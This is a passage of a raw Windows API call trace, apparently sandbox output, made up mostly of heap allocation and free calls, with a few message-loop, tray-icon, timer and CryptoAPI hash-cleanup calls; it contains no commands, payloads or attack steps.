dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.071] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0193.071] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0193.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0193.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0193.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0193.072] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0193.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0193.073] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.073] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0193.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0193.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0193.074] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.074] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0193.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0193.078] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0193.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0193.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0193.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.079] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0193.079] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0193.079] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0193.079] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0193.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0193.079] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0193.079] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.080] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0193.080] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0193.080] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0193.080] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.080] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0193.080] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0193.080] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.080] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba390 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd900 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0193.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0193.081] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.082] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0193.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0193.082] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0193.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0193.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0193.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.082] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0193.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0193.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0193.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0193.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0193.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0193.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0193.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0193.083] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0193.083] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0193.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0193.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0193.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0193.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0193.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0193.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d4c0 [0193.084] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0193.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0193.084] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0193.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0193.084] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0193.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0193.084] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0193.085] CryptDestroyHash (hHash=0x90ae18) returned 1 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0193.085] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0193.085] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0193.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | 